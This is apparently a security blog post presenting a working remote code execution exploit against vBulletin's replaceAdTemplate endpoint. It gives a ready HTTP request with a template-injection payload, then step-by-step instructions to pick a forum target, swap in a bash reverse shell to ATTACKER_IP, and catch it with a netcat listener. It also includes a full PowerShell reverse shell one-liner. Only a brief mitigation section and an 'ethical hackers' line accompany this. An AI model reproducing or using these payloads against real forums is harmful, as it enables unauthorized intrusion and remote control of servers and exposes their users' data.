0day vBulletin replaceAdTemplate Remote Code Execution POC

Listen to this Post

Featured Image

POC Details:

The following proof-of-concept (POC) demonstrates a Remote Code Execution (RCE) vulnerability in vBulletin via the `replaceAdTemplate` endpoint.

Exploit Request:

POST /ajax/api/ad/replaceAdTemplate HTTP/1.1 
Host: localhost 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 116

routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=3444&template=<vb:if condition='"phpinfo"()'></vb:if> 

Full Exploit Details: GitHub – Sachinart/vbulletin-rce

You Should Know:

1. Vulnerability Analysis

  • The exploit abuses vBulletin’s template rendering to execute arbitrary PHP code.
  • The `replaceAdTemplate` endpoint fails to sanitize user input, allowing code injection.

2. Exploitation Steps

  1. Identify Target: Find a vBulletin forum (version vulnerable to this exploit).
  2. Craft Malicious Request: Use the above HTTP request with a modified `template` parameter.
  3. Execute Code: Replace `phpinfo()` with a reverse shell payload:
    <vb:if condition='"system(\"bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\'\")'></vb:if>
    
  4. Gain Shell: Set up a listener (nc -lvnp PORT) to catch the connection.

3. Mitigation & Detection

  • Patch: Update vBulletin to the latest version.
  • WAF Rules: Block suspicious `replaceAdTemplate` requests.
  • Log Monitoring: Check for unusual POST requests to /ajax/api/ad/replaceAdTemplate.
    1. Linux & Windows Commands for Exploit Testing
  • Linux (Netcat Listener):
    nc -lvnp 4444 
    
  • Windows (PowerShell Reverse Shell):
    powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    

What Undercode Say:

This exploit highlights the dangers of unsanitized input in web applications. Ethical hackers should test such vulnerabilities responsibly, while organizations must enforce strict input validation and patch management.

Expected Output:

  • Successful RCE leads to a reverse shell.
  • Unpatched vBulletin forums remain high-risk targets.

Prediction:

As AI-powered security tools evolve, attackers will increasingly exploit legacy systems like vBulletin, making automated vulnerability scanning essential.

Relevant Course:

Defending Against AI-Powered Cyber Threats (Free Webinar)

References:

Reported By: Chirag99artani Github – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram